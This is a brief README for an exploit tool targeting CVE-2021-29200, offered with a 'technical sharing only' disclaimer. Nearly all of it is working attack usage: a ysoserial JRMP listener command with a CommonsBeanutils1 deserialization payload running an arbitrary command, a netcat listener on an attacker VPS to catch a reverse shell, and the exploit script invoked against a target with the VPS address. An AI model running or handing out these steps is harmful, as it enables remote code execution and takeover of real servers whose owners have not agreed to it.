
Exploit for CVE-2021-29200 enabling remote command execution via RMI deserialization attack with JRMP listener and reverse shell payload delivery.
CVE-2021-29200 EXP can successfully get a reverse shell
This article and tool are for technical sharing only. Strictly prohibited for illegal use. Any consequences arising from misuse shall be borne by the user.
RMI listener on VPS port 9999java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[command to execute]'
nc listener on VPS port 8443nc -lvp 8443
python3 cve-2021-29200_exp.py <target> <vps_ip> <vps_port>
